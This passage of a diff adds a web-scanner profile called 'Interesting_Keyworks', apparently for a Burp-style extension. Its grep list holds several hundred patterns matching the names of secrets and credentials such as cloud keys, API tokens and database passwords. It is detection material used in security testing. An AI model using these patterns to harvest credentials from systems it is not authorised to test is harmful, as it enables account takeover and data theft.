alse,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Interesting Keywords","IssueSeverity":"Information","IssueConfidence":"Tentative","IssueDetail":"Interesting Keywords detected. Needs manual revision, it could means nothing","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Interesting_Keyworks",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,adzerk[_-]api[_-]key",
+ "true,Or,algolia[_-]admin[_-]key[_-]1",
+ "true,Or,algolia[_-]admin[_-]key[_-]2",
+ "true,Or,algolia[_-]admin[_-]key[_-]mcm",
+ "true,Or,algolia[_-]api[_-]key",
+ "true,Or,algolia[_-]api[_-]key[_-]mcm",
+ "true,Or,algolia[_-]api[_-]key[_-]search",
+ "true,Or,algolia[_-]search[_-]api[_-]key",
+ "true,Or,algolia[_-]search[_-]key",
+ "true,Or,algolia[_-]search[_-]key[_-]1",
+ "true,Or,alicloud[_-]access[_-]key",
+ "true,Or,alicloud[_-]secret[_-]key",
+ "true,Or,amazon[_-]bucket[_-]name",
+ "true,Or,amazon[_-]secret[_-]access[_-]key",
+ "true,Or,anaconda[_-]token",
+ "true,Or,android[_-]docs[_-]deploy[_-]token",
+ "true,Or,ansible[_-]vault[_-]password",
+ "true,Or,apiary[_-]api[_-]key",
+ "true,Or,apigw[_-]access[_-]token",
+ "true,Or,app[_-]bucket[_-]perm",
+ "true,Or,app[_-]report[_-]token[_-]key",
+ "true,Or,apple[_-]id[_-]password",
+ "true,Or,argos[_-]token",
+ "true,Or,artifactory[_-]key",
+ "true,Or,artifacts[_-]aws[_-]access[_-]key[_-]id",
+ "true,Or,artifacts[_-]aws[_-]secret[_-]access[_-]key",
+ "true,Or,artifacts[_-]bucket",
+ "true,Or,artifacts[_-]key",
+ "true,Or,artifacts[_-]secret",
+ "true,Or,assistant[_-]iam[_-]apikey",
+ "true,Or,auth0[_-]api[_-]clientsecret",
+ "true,Or,auth0[_-]client[_-]secret",
+ "true,Or,author[_-]email[_-]addr",
+ "true,Or,author[_-]npm[_-]api[_-]key",
+ "true,Or,aws[_-]access[_-]key",
+ "true,Or,aws[_-]access[_-]key[_-]id",
+ "true,Or,aws[_-]config[_-]accesskeyid",
+ "true,Or,aws[_-]config[_-]secretaccesskey",
+ "true,Or,aws[_-]secret[_-]access[_-]key",
+ "true,Or,aws[_-]secret[_-]key",
+ "true,Or,aws[_-]ses[_-]access[_-]key[_-]id",
+ "true,Or,aws[_-]ses[_-]secret[_-]access[_-]key",
+ "true,Or,awscn[_-]access[_-]key[_-]id",
+ "true,Or,awscn[_-]secret[_-]access[_-]key",
+ "true,Or,b2[_-]app[_-]key",
+ "true,Or,b2[_-]bucket",
+ "true,Or,bintray[_-]api[_-]key",
+ "true,Or,bintray[_-]apikey",
+ "true,Or,bintray[_-]gpg[_-]password",
+ "true,Or,bintray[_-]key",
+ "true,Or,bintray[_-]token",
+ "true,Or,bluemix[_-]api[_-]key",
+ "true,Or,bluemix[_-]auth",
+ "true,Or,bluemix[_-]pass",
+ "true,Or,bluemix[_-]pass[_-]prod",
+ "true,Or,bluemix[_-]password",
+ "true,Or,bluemix[_-]pwd",
+ "true,Or,bluemix[_-]username",
+ "true,Or,brackets[_-]repo[_-]oauth[_-]token",
+ "true,Or,browser[_-]stack[_-]access[_-]key",
+ "true,Or,browserstack[_-]access[_-]key",
+ "true,Or,bucketeer[_-]aws[_-]access[_-]key[_-]id",
+ "true,Or,bucketeer[_-]aws[_-]secret[_-]access[_-]key",
+ "true,Or,built[_-]branch[_-]deploy[_-]key",
+ "true,Or,bundlesize[_-]github[_-]token",
+ "true,Or,bx[_-]password",
+ "true,Or,bx[_-]username",
+ "true,Or,cache[_-]s3[_-]secret[_-]key",
+ "true,Or,cargo[_-]token",
+ "true,Or,cattle[_-]access[_-]key",
+ "true,Or,cattle[_-]agent[_-]instance[_-]auth",
+ "true,Or,cattle[_-]secret[_-]key",
+ "true,Or,censys[_-]secret",
+ "true,Or,certificate[_-]password",
+ "true,Or,cf[_-]password",
+ "true,Or,cheverny[_-]token",
+ "true,Or,chrome[_-]client[_-]secret",
+ "true,Or,chrome[_-]refresh[_-]token",
+ "true,Or,ci[_-]deploy[_-]password",
+ "true,Or,ci[_-]project[_-]url",
+ "true,Or,ci[_-]registry[_-]user",
+ "true,Or,ci[_-]server[_-]name",
+ "true,Or,ci[_-]user[_-]token",
+ "true,Or,claimr[_-]database",
+ "true,Or,claimr[_-]db",
+ "true,Or,claimr[_-]superuser",
+ "true,Or,claimr[_-]token",
+ "true,Or,cli[_-]e2e[_-]cma[_-]token",
+ "true,Or,client[_-]secret",
+ "true,Or,clojars[_-]password",
+ "true,Or,cloud[_-]api[_-]key",
+ "true,Or,cloudant[_-]archived[_-]database",
+ "true,Or,cloudant[_-]audited[_-]database",
+ "true,Or,cloudant[_-]database",
+ "true,Or,cloudant[_-]instance",
+ "true,Or,cloudant[_-]order[_-]database",
+ "true,Or,cloudant[_-]parsed[_-]database",
+ "true,Or,cloudant[_-]password",
+ "true,Or,cloudant[_-]processed[_-]database",
+ "true,Or,cloudant[_-]service[_-]database",
+ "true,Or,cloudflare[_-]api[_-]key",
+ "true,Or,cloudflare[_-]auth[_-]email",
+ "true,Or,cloudflare[_-]auth[_-]key",
+ "true,Or,cloudflare[_-]email",
+ "true,Or,cloudinary[_-]url",
+ "true,Or,cloudinary[_-]url[_-]staging",
+ "true,Or,clu[_-]repo[_-]url",
+ "true,Or,clu[_-]ssh[_-]private[_-]key[_-]base64",
+ "true,Or,cn[_-]access[_-]key[_-]id",
+ "true,Or,cn[_-]secret[_-]access[_-]key",
+ "true,Or,cocoapods[_-]trunk[_-]email",
+ "true,Or,cocoapods[_-]trunk[_-]token",
+ "true,Or,codacy[_-]project[_-]token",
+ "true,Or,codeclimate[_-]repo[_-]token",
+ "true,Or,codecov[_-]token",
+ "true,Or,coding[_-]token",
+ "true,Or,conekta[_-]apikey",
+ "true,Or,contentful[_-]access[_-]token",
+ "true,Or,contentful[_-]cma[_-]test[_-]token",
+ "true,Or,contentful[_-]integration[_-]management[_-]token",
+ "true,Or,contentful[_-]management[_-]api[_-]access[_-]token",
+ "true,Or,contentful[_-]management[_-]api[_-]access[_-]token[_-]new",
+ "true,Or,contentful[_-]php[_-]management[_-]test[_-]token",
+ "true,Or,contentful[_-]test[_-]org[_-]cma[_-]token",
+ "true,Or,contentful[_-]v2[_-]access[_-]token",
+ "true,Or,conversation[_-]password",
+ "true,Or,conversation[_-]username",
+ "true,Or,cos[_-]secrets",
+ "true,Or,coveralls[_-]api[_-]token",
+ "true,Or,coveralls[_-]repo[_-]token",
+ "true,Or,coveralls[_-]token",
+ "true,Or,coverity[_-]scan[_-]token",
+ "true,Or,cypress[_-]record[_-]key",
+ "true,Or,danger[_-]github[_-]api[_-]token",
+ "true,Or,database[_-]host",
+ "true,Or,database[_-]name",
+ "true,Or,database[_-]password",
+ "true,Or,database[_-]port",
+ "true,Or,database[_-]user",
+ "true,Or,database[_-]username",
+ "true,Or,datadog[_-]api[_-]key",
+ "true,Or,datadog[_-]app[_-]key",
+ "true,Or,db[_-]connection",
+ "true,Or,db[_-]database",
+ "true,Or,db[_-]host",
+ "true,Or,db[_-]password",
+ "true,Or,db[_-]pw",
+ "true,Or,db[_-]user",
+ "true,Or,db[_-]username",
+ "true,Or,ddg[_-]test[_-]email",
+ "true,Or,ddg[_-]test[_-]email[_-]pw",
+ "true,Or,ddgc[_-]github[_-]token",
+ "true,Or,deploy[_-]password",
+ "true,Or,deploy[_-]secure",
+ "true,Or,deploy[_-]token",
+ "true,Or,deploy[_-]user",
+ "true,Or,dgpg[_-]passphrase",
+ "true,Or,digitalocean[_-]access[_-]token",
+ "true,Or,digitalocean[_-]ssh[_-]key[_-]body",
+ "true,Or,digitalocean[_-]ssh[_-]key[_-]ids",
+ "true,Or,docker[_-]hub[_-]password",
+ "true,Or,docker[_-]key",
+ "true,Or,docker[_-]pass",
+ "true,Or,docker[_-]passwd",
+ "true,Or,docker[_-]password",
+ "true,Or,docker[_-]postgres[_-]url",
+ "true,Or,docker[_-]token",
+ "true,Or,dockerhub[_-]password",
+ "true,Or,dockerhubpassword",
+ "true,Or,doordash[_-]auth[_-]token",
+ "true,Or,dropbox[_-]oauth[_-]bearer",
+ "true,Or,droplet[_-]travis[_-]password",
+ "true,Or,dsonar[_-]login",
+ "true,Or,dsonar[_-]projectkey",
+ "true,Or,elastic[_-]cloud[_-]auth",
+ "true,Or,elasticsearch[_-]password",
+ "true,Or,encryption[_-]password",
+ "true,Or,end[_-]user[_-]password",
+ "true,Or,env[_-]github[_-]oauth[_-]token",
+ "true,Or,env[_-]heroku[_-]api[_-]key",
+ "true,Or,env[_-]key",
+ "true,Or,env[_-]secret",
+ "true,Or,env[_-]secret[_-]access[_-]key",
+ "true,Or,env[_-]sonatype[_-]password",
+ "true,Or,eureka[_-]awssecretkey",
+ "true,Or,exp[_-]password",
+ "true,Or,file[_-]password",
+ "true,Or,firebase[_-]api[_-]json",
+ "true,Or,firebase[_-]api[_-]token",
+ "true,Or,firebase[_-]key",
+ "true,Or,firebase[_-]project[_-]develop",
+ "true,Or,firebase[_-]token",
+ "true,Or,firefox[_-]secret",
+ "true,Or,flask[_-]secret[_-]key",
+ "true,Or,flickr[_-]api[_-]key",
+ "true,Or,flickr[_-]api[_-]secret",
+ "true,Or,fossa[_-]api[_-]key",
+ "true,Or,ftp[_-]host",
+ "true,Or,ftp[_-]login",
+ "true,Or,ftp[_-]password",
+ "true,Or,ftp[_-]pw",
+ "true,Or,ftp[_-]user",
+ "true,Or,ftp[_-]username",
+ "true,Or,gcloud[_-]bucket",
+ "true,Or,gcloud[_-]project",
+ "true,Or,gcloud[_-]service[_-]key",
+ "true,Or,gcr[_-]password",
+ "true,Or,gcs[_-]bucket",
+ "true,Or,gh[_-]api[_-]key",
+ "true,Or,gh[_-]email",
+ "true,Or,gh[_-]next[_-]oauth[_-]client[_-]secret",
+ "true,Or,gh[_-]next[_-]unstable[_-]oauth[_-]client[_-]id",
+ "true,Or,gh[_-]next[_-]unstable[_-]oauth[_-]client[_-]secret",
+ "true,Or,gh[_-]oauth[_-]client[_-]secret",
+ "true,Or,gh[_-]oauth[_-]token",
+ "true,Or,gh[_-]repo[_-]token",
+ "true,Or,gh[_-]token",
+ "true,Or,gh[_-]unstable[_-]oauth[_-]client[_-]secret",
+ "true,Or,ghb[_-]token",
+ "true,Or,ghost[_-]api[_-]key",
+ "true,Or,git[_-]author[_-]email",
+ "true,Or,git[_-]author[_-]name",
+ "true,Or,git[_-]committer[_-]email",
+ "true,Or,git[_-]committer[_-]name",
+ "true,Or,git[_-]email",
+ "true,Or,git[_-]name",
+ "true,Or,git[_-]token",
+ "true,Or,github[_-]access[_-]token",
+ "true,Or,github[_-]api[_-]key",
+ "true,Or,github[_-]api[_-]token",
+ "true,Or,github[_-]auth",
+ "true,Or,github[_-]auth[_-]token",
+ "true,Or,github[_-]client[_-]secret",
+ "true,Or,github[_-]deploy[_-]hb[_-]doc[_-]pass",
+ "true,Or,github[_-]deployment[_-]token",
+ "true,Or,github[_-]hunter[_-]token",
+ "true,Or,github[_-]hunter[_-]username",
+ "true,Or,github[_-]oauth",
+ "true,Or,github[_-]oauth[_-]token",
+ "true,Or,github[_-]password",
+ "true,Or,github[_-]pwd",
+ "true,Or,github[_-]release[_-]token",
+ "true,Or,github[_-]repo",
+ "true,Or,github[_-]token",
+ "true,Or,github[_-]tokens",
+ "true,Or,gitlab[_-]user[_-]email",
+ "true,Or,gogs[_-]password",
+ "true,Or,google[_-]account[_-]type",
+ "true,Or,google[_-]client[_-]email",
+ "true,Or,google[_-]client[_-]id",
+ "true,Or,google[_-]client[_-]secret",
+ "true,Or,google[_-]maps[_-]api[_-]key",
+ "true,Or,google[_-]private[_-]key",
+ "true,Or,gpg[_-]key[_-]name",
+ "true,Or,gpg[_-]keyname",
+ "true,Or,gpg[_-]ownertrust",
+ "true,Or,gpg[_-]passphrase",
+ "true,Or,gpg[_-]private[_-]key",
+ "true,Or,gpg[_-]secret[_-]keys",
+ "true,Or,gradle[_-]publish[_-]key",
+ "true,Or,gradle[_-]publish[_-]secret",
+ "true,Or,gradle[_-]signing[_-]key[_-]id",
+ "true,Or,gradle[_-]signing[_-]password",
+ "true,Or,gren[_-]github[_-]token",
+ "true,Or,grgit[_-]user",
+ "true,Or,hab[_-]auth[_-]token",
+ "true,Or,hab[_-]key",
+ "true,Or,hb[_-]codesign[_-]gpg[_-]pass",
+ "true,Or,hb[_-]codesign[_-]key[_-]pass",
+ "true,Or,heroku[_-]api[_-]key",
+ "true,Or,heroku[_-]email",
+ "true,Or,heroku[_-]token",
+ "true,Or,hockeyapp[_-]token",
+ "true,Or,homebrew[_-]github[_-]api[_-]token",
+ "true,Or,hub[_-]dxia2[_-]password",
+ "true,Or,ij[_-]repo[_-]password",
+ "true,Or,ij[_-]repo[_-]username",
+ "true,Or,index[_-]name",
+ "true,Or,integration[_-]test[_-]api[_-]key",
+ "true,Or,integration[_-]test[_-]appid",
+ "true,Or,internal[_-]secrets",
+ "true,Or,ios[_-]docs[_-]deploy[_-]token",
+ "true,Or,itest[_-]gh[_-]token",
+ "true,Or,jdbc[_-]databaseurl",
+ "true,Or,jdbc[_-]host",
+ "true,Or,jwt[_-]secret",
+ "true,Or,kafka[_-]admin[_-]url",
+ "true,Or,kafka[_-]instance[_-]name",
+ "true,Or,kafka[_-]rest[_-]url",
+ "true,Or,keystore[_-]pass",
+ "true,Or,kovan[_-]private[_-]key",
+ "true,Or,kubecfg[_-]s3[_-]path",
+ "true,Or,kxoltsn3vogdop92m",
+ "true,Or,leanplum[_-]key",
+ "true,Or,lektor[_-]deploy[_-]password",
+ "true,Or,lektor[_-]deploy[_-]username",
+ "true,Or,lighthouse[_-]api[_-]key",
+ "true,Or,linkedin[_-]client[_-]secretor lottie[_-]s3[_-]api[_-]key",
+ "true,Or,linux[_-]signing[_-]key",
+ "true,Or,ll[_-]publish[_-]url",
+ "true,Or,ll[_-]shared[_-]key",
+ "true,Or,looker[_-]test[_-]runner[_-]client[_-]secret",
+ "true,Or,lottie[_-]happo[_-]api[_-]key",
+ "true,Or,lottie[_-]happo[_-]secret[_-]key",
+ "true,Or,lottie[_-]s3[_-]secret[_-]key",
+ "true,Or,lottie[_-]upload[_-]cert[_-]key[_-]password",
+ "true,Or,lottie[_-]upload[_-]cert[_-]key[_-]store[_-]password",
+ "true,Or,magento[_-]auth[_-]password",
+ "true,Or,magento[_-]auth[_-]username ",
+ "true,Or,magento[_-]password",
+ "true,Or,mail[_-]password",
+ "true,Or,mailchimp[_-]api[_-]key",
+ "true,Or,mailchimp[_-]key",
+ "true,Or,mailer[_-]password",
+ "true,Or,mailgun[_-]api[_-]key",
+ "true,Or,mailgun[_-]apikey",
+ "true,Or,mailgun[_-]password",
+ "true,Or,mailgun[_-]priv[_-]key",
+ "true,Or,mailgun[_-]pub[_-]apikey",
+ "true,Or,mailgun[_-]pub[_-]key",
+ "true,Or,mailgun[_-]secret[_-]api[_-]key",
+ "true,Or,manage[_-]key",
+ "true,Or,manage[_-]secret",
+ "true,Or,management[_-]token",
+ "true,Or,managementapiaccesstoken",
+ "true,Or,mandrill[_-]api[_-]key",
+ "true,Or,manifest[_-]app[_-]token",
+ "true,Or,manifest[_-]app[_-]url",
+ "true,Or,mapbox[_-]access[_-]token",
+ "true,Or,mapbox[_-]api[_-]token",
+ "true,Or,mapbox[_-]aws[_-]access[_-]key[_-]id",
+ "true,Or,mapbox[_-]aws[_-]secret[_-]access[_-]key",
+ "true,Or,mapboxaccesstoken",
+ "true,Or,mg[_-]api[_-]key",
+ "true,Or,mg[_-]public[_-]api[_-]key",
+ "true,Or,mh[_-]apikey",
+ "true,Or,mh[_-]password",
+ "true,Or,mile[_-]zero[_-]key",
+ "true,Or,minio[_-]access[_-]key",
+ "true,Or,minio[_-]secret[_-]key",
+ "true,Or,multi[_-]bob[_-]sid",
+ "true,Or,multi[_-]connect[_-]sid",
+ "true,Or,multi[_-]disconnect[_-]sid",
+ "true,Or,multi[_-]workflow[_-]sid",
+ "true,Or,multi[_-]workspace[_-]sid",
+ "true,Or,my[_-]secret[_-]env",
+ "true,Or,mysql[_-]database",
+ "true,Or,mysql[_-]hostname",
+ "true,Or,mysql[_-]password",
+ "true,Or,mysql[_-]root[_-]password",
+ "true,Or,mysql[_-]user",
+ "true,Or,mysql[_-]username",
+ "true,Or,mysqlmasteruser",
+ "true,Or,mysqlsecret",
+ "true,Or,netlify[_-]api[_-]key",
+ "true,Or,new[_-]relic[_-]beta[_-]token",
+ "true,Or,nexus[_-]password",
+ "true,Or,nexuspassword",
+ "true,Or,ngrok[_-]auth[_-]token",
+ "true,Or,ngrok[_-]token",
+ "true,Or,node[_-]env",
+ "true,Or,node[_-]pre[_-]gyp[_-]accesskeyid",
+ "true,Or,node[_-]pre[_-]gyp[_-]github[_-]token",
+ "true,Or,node[_-]pre[_-]gyp[_-]secretaccesskey",
+ "true,Or,non[_-]token",
+ "true,Or,now[_-]token",
+ "true,Or,npm[_-]api[_-]key",
+ "true,Or,npm[_-]api[_-]token",
+ "true,Or,npm[_-]auth[_-]token",
+ "true,Or,npm[_-]email",
+ "true,Or,npm[_-]password",
+ "true,Or,npm[_-]secret[_-]key",
+ "true,Or,npm[_-]token",
+ "true,Or,nuget[_-]api[_-]key",
+ "true,Or,nuget[_-]apikey",
+ "true,Or,nuget[_-]key",
+ "true,Or,numbers[_-]service[_-]pass",
+ "true,Or,oauth[_-]token",
+ "true,Or,object[_-]storage[_-]password",
+ "true,Or,object[_-]storage[_-]region[_-]name",
+ "true,Or,object[_-]store[_-]bucket",
+ "true,Or,object[_-]store[_-]creds",
+ "true,Or,oc[_-]pass",
+ "true,Or,octest[_-]app[_-]password",
+ "true,Or,octest[_-]app[_-]username",
+ "true,Or,octest[_-]password",
+ "true,Or,ofta[_-]key",
+ "true,Or,ofta[_-]region",
+ "true,Or,ofta[_-]secret",
+ "true,Or,okta[_-]client[_-]token",
+ "true,Or,okta[_-]oauth2[_-]client[_-]secret",
+ "true,Or,okta[_-]oauth2[_-]clientsecret",
+ "true,Or,omise[_-]key",
+ "true,Or,omise[_-]pkey",
+ "true,Or,omise[_-]pubkey",
+ "true,Or,omise[_-]skey",
+ "true,Or,onesignal[_-]api[_-]key",
+ "true,Or,onesignal[_-]user[_-]auth[_-]key",
+ "true,Or,open[_-]whisk[_-]key",
+ "true,Or,openwhisk[_-]key",
+ "true,Or,org[_-]gradle[_-]project[_-]sonatype[_-]nexus[_-]password",
+ "true,Or,org[_-]project[_-]gradle[_-]sonatype[_-]nexus[_-]password",
+ "true,Or,os[_-]auth[_-]url",
+ "true,Or,os[_-]password",
+ "true,Or,ossrh[_-]jira[_-]password",
+ "true,Or,ossrh[_-]pass",
+ "true,Or,ossrh[_-]password",
+ "true,Or,ossrh[_-]secret",
+ "true,Or,ossrh[_-]username",
+ "true,Or,packagecloud[_-]token",
+ "true,Or,pagerduty[_-]apikey",
+ "true,Or,parse[_-]js[_-]key",
+ "true,Or,passwordtravis",
+ "true,Or,paypal[_-]client[_-]secret",
+ "true,Or,percy[_-]project",
+ "true,Or,percy[_-]token",
+ "true,Or,personal[_-]key",
+ "true,Or,personal[_-]secret",
+ "true,Or,pg[_-]database",
+ "true,Or,pg[_-]host",
+ "true,Or,places[_-]api[_-]key",
+ "true,Or,places[_-]apikey",
+ "true,Or,plotly[_-]apikey",
+ "true,Or,plugin[_-]password",
+ "true,Or,postgres[_-]env[_-]postgres[_-]db",
+ "true,Or,postgres[_-]env[_-]postgres[_-]password",
+ "true,Or,postgresql[_-]db",
+ "true,Or,postgresql[_-]pass",
+ "true,Or,prebuild[_-]auth",
+ "true,Or,preferred[_-]username",
+ "true,Or,pring[_-]mail[_-]username",
+ "true,Or,private[_-]signing[_-]password",
+ "true,Or,prod[_-]access[_-]key[_-]id",
+ "true,Or,prod[_-]password",
+ "true,Or,prod[_-]secret[_-]key",
+ "true,Or,project[_-]config",
+ "true,Or,publish[_-]access",
+ "true,Or,publish[_-]key",
+ "true,Or,publish[_-]secret",
+ "true,Or,pushover[_-]token",
+ "true,Or,pypi[_-]passowrd",
+ "true,Or,qiita[_-]token",
+ "true,Or,quip[_-]token",
+ "true,Or,rabbitmq[_-]password",
+ "true,Or,randrmusicapiaccesstoken",
+ "true,Or,redis[_-]stunnel[_-]urls",
+ "true,Or,rediscloud[_-]url",
+ "true,Or,refresh[_-]token",
+ "true,Or,registry[_-]pass",
+ "true,Or,registry[_-]secure",
+ "true,Or,release[_-]gh[_-]token",
+ "true,Or,release[_-]token",
+ "true,Or,reporting[_-]webdav[_-]pwd",
+ "true,Or,reporting[_-]webdav[_-]url",
+ "true,Or,repotoken",
+ "true,Or,rest[_-]api[_-]key",
+ "true,Or,rinkeby[_-]private[_-]key",
+ "true,Or,ropsten[_-]private[_-]key",
+ "true,Or,route53[_-]access[_-]key[_-]id",
+ "true,Or,rtd[_-]key[_-]pass",
+ "true,Or,rtd[_-]store[_-]pass",
+ "true,Or,rubygems[_-]auth[_-]token",
+ "true,Or,s3[_-]access[_-]key",
+ "true,Or,s3[_-]access[_-]key[_-]id",
+ "true,Or,s3[_-]bucket[_-]name[_-]app[_-]logs",
+ "true,Or,s3[_-]bucket[_-]name[_-]assets",
+ "true,Or,s3[_-]external[_-]3[_-]amazonaws[_-]com",
+ "true,Or,s3[_-]key",
+ "true,Or,s3[_-]key[_-]app[_-]logs",
+ "true,Or,s3[_-]key[_-]assets",
+ "true,Or,s3[_-]secret[_-]app[_-]logs",
+ "true,Or,s3[_-]secret[_-]assets",
+ "true,Or,s3[_-]secret[_-]key",
+ "true,Or,s3[_-]user[_-]secret",
+ "true,Or,sacloud[_-]access[_-]token",
+ "true,Or,sacloud[_-]access[_-]token[_-]secret",
+ "true,Or,sacloud[_-]api",
+ "true,Or,salesforce[_-]bulk[_-]test[_-]password",
+ "true,Or,salesforce[_-]bulk[_-]test[_-]security[_-]token",
+ "true,Or,sandbox[_-]access[_-]token",
+ "true,Or,sandbox[_-]aws[_-]access[_-]key[_-]id",
+ "true,Or,sandbox[_-]aws[_-]secret[_-]access[_-]key",
+ "true,Or,sauce[_-]access[_-]key",
+ "true,Or,scrutinizer[_-]token",
+ "true,Or,sdr[_-]token",
+ "true,Or,secret[_-]0",
+ "true,Or,secret[_-]1",
+ "true,Or,secret[_-]10",
+ "true,Or,secret[_-]11",
+ "true,Or,secret[_-]2",
+ "true,Or,secret[_-]3",
+ "true,Or,secret[_-]4",
+ "true,Or,secret[_-]5",
+ "true,Or,secret[_-]6",
+ "true,Or,secret[_-]7",
+ "true,Or,secret[_-]8",
+ "true,Or,secret[_-]9",
+ "true,Or,secret[_-]key[_-]base",
+ "true,Or,segment[_-]api[_-]key",
+ "true,Or,selion[_-]log[_-]level[_-]dev",
+ "true,Or,selion[_-]selenium[_-]host",
+ "true,Or,sendgrid[_-]api[_-]key",
+ "true,Or,sendgrid[_-]key",
+ "true,Or,sendgrid[_-]password",
+ "true,Or,sendgrid[_-]user",
+ "true,Or,sendgrid[_-]username",
+ "true,Or,sendwithus[_-]key",
+ "true,Or,sentry[_-]auth[_-]token",
+ "true,Or,sentry[_-]default[_-]org",
+ "true,Or,sentry[_-]endpoint",
+ "true,Or,sentry[_-]key",
+ "true,Or,service[_-]account[_-]secret",
+ "true,Or,ses[_-]access[_-]key",
+ "true,Or,ses[_-]secret[_-]key",
+ "true,Or,signing[_-]key",
+ "true,Or,signing[_-]key[_-]password",
+ "true,Or,signing[_-]key[_-]secret",
+ "true,Or,signing[_-]key[_-]sid",
+ "true,Or,slash[_-]developer[_-]space",
+ "true,Or,slash[_-]developer[_-]space[_-]key",
+ "true,Or,slate[_-]user[_-]email",
+ "true,Or,snoowrap[_-]client[_-]secret",
+ "true,Or,snoowrap[_-]password",
+ "true,Or,snoowrap[_-]refresh[_-]token",
+ "true,Or,snyk[_-]api[_-]token",
+ "true,Or,snyk[_-]token",
+ "true,Or,socrata[_-]app[_-]token",
+ "true,Or,socrata[_-]password",
+ "true,Or,sonar[_-]organization[_-]key",
+ "true,Or,sonar[_-]project[_-]key",
+ "true,Or,sonar[_-]token",
+ "true,Or,sonatype[_-]gpg[_-]key[_-]name",
+ "true,Or,sonatype[_-]gpg[_-]passphrase",
+ "true,Or,sonatype[_-]nexus[_-]password",
+ "true,Or,sonatype[_-]pass",
+ "true,Or,sonatype[_-]password",
+ "true,Or,sonatype[_-]token[_-]password",
+ "true,Or,sonatype[_-]token[_-]user",
+ "true,Or,sonatypepassword",
+ "true,Or,soundcloud[_-]client[_-]secret",
+ "true,Or,soundcloud[_-]password",
+ "true,Or,spaces[_-]access[_-]key[_-]id",
+ "true,Or,spaces[_-]secret[_-]access[_-]key",
+ "true,Or,spotify[_-]api[_-]access[_-]token",
+ "true,Or,spotify[_-]api[_-]client[_-]secret",
+ "true,Or,spring[_-]mail[_-]password",
+ "true,Or,sqsaccesskey",
+ "true,Or,sqssecretkey",
+ "true,Or,square[_-]reader[_-]sdk[_-]repository[_-]password",
+ "true,Or,srcclr[_-]api[_-]token",
+ "true,Or,ssmtp[_-]config",
+ "true,Or,staging[_-]base[_-]url[_-]runscope",
+ "true,Or,star[_-]test[_-]aws[_-]access[_-]key[_-]id",
+ "true,Or,star[_-]test[_-]bucket",
+ "true,Or,star[_-]test[_-]location",
+ "true,Or,star[_-]test[_-]secret[_-]access[_-]key",
+ "true,Or,starship[_-]account[_-]sid",
+ "true,Or,starship[_-]auth[_-]token",
+ "true,Or,stormpath[_-]api[_-]key[_-]id",
+ "true,Or,stormpath[_-]api[_-]key[_-]secret",
+ "true,Or,strip[_-]publishable[_-]key",
+ "true,Or,strip[_-]secret[_-]key",
+ "true,Or,stripe[_-]private",
+ "true,Or,stripe[_-]public",
+ "true,Or,surge[_-]login",
+ "true,Or,surge[_-]token",
+ "true,Or,svn[_-]pass",
+ "true,Or,tesco[_-]api[_-]key",
+ "true,Or,test[_-]github[_-]token",
+ "true,Or,test[_-]test",
+ "true,Or,tester[_-]keys[_-]password",
+ "true,Or,thera[_-]oss[_-]access[_-]key",
+ "true,Or,token[_-]core[_-]java",
+ "true,Or,travis[_-]access[_-]token",
+ "true,Or,travis[_-]api[_-]token",
+ "true,Or,travis[_-]branch",
+ "true,Or,travis[_-]com[_-]token",
+ "true,Or,travis[_-]e2e[_-]token",
+ "true,Or,travis[_-]gh[_-]token",
+ "true,Or,travis[_-]pull[_-]request",
+ "true,Or,travis[_-]secure[_-]env[_-]vars",
+ "true,Or,travis[_-]token",
+ "true,Or,trex[_-]client[_-]token",
+ "true,Or,trex[_-]okta[_-]client[_-]token",
+ "true,Or,twilio[_-]api[_-]key",
+ "true,Or,twilio[_-]api[_-]secret",
+ "true,Or,twilio[_-]chat[_-]account[_-]api[_-]service",
+ "true,Or,twilio[_-]configuration[_-]sid",
+ "true,Or,twilio[_-]sid",
+ "true,Or,twilio[_-]token",
+ "true,Or,twine[_-]password",
+ "true,Or,twitter[_-]consumer[_-]key",
+ "true,Or,twitter[_-]consumer[_-]secret",
+ "true,Or,twitteroauthaccesssecret",
+ "true,Or,twitteroauthaccesstoken",
+ "true,Or,unity[_-]password",
+ "true,Or,unity[_-]serial",
+ "true,Or,urban[_-]key",
+ "true,Or,urban[_-]master[_-]secret",
+ "true,Or,urban[_-]secret",
+ "true,Or,us[_-]east[_-]1[_-]elb[_-]amazonaws[_-]com",
+ "true,Or,use[_-]ssh",
+ "true,Or,user[_-]assets[_-]access[_-]key[_-]id",
+ "true,Or,user[_-]assets[_-]secret[_-]access[_-]key",
+ "true,Or,v[_-]sfdc[_-]client[_-]secret",
+ "true,Or,v[_-]sfdc[_-]password",
+ "true,Or,vip[_-]github[_-]build[_-]repo[_-]deploy[_-]key",
+ "true,Or,vip[_-]github[_-]deploy[_-]key",
+ "true,Or,vip[_-]github[_-]deploy[_-]key[_-]pass",
+ "true,Or,virustotal[_-]apikey",
+ "true,Or,visual[_-]recognition[_-]api[_-]key",
+ "true,Or,wakatime[_-]api[_-]key",
+ "true,Or,watson[_-]conversation[_-]password",
+ "true,Or,watson[_-]device[_-]password",
+ "true,Or,watson[_-]password",
+ "true,Or,widget[_-]basic[_-]password",
+ "true,Or,widget[_-]basic[_-]password[_-]2",
+ "true,Or,widget[_-]basic[_-]password[_-]3",
+ "true,Or,widget[_-]basic[_-]password[_-]4",
+ "true,Or,widget[_-]basic[_-]password[_-]5",
+ "true,Or,widget[_-]fb[_-]password",
+ "true,Or,widget[_-]fb[_-]password[_-]2",
+ "true,Or,widget[_-]fb[_-]password[_-]3",
+ "true,Or,widget[_-]test[_-]server",
+ "true,Or,wincert[_-]password",
+ "true,Or,wordpress[_-]db[_-]password",
+ "true,Or,wordpress[_-]db[_-]user",
+ "true,Or,wpjm[_-]phpunit[_-]google[_-]geocode[_-]api[_-]key",
+ "true,Or,wporg[_-]password",
+ "true,Or,wpt[_-]db[_-]password",
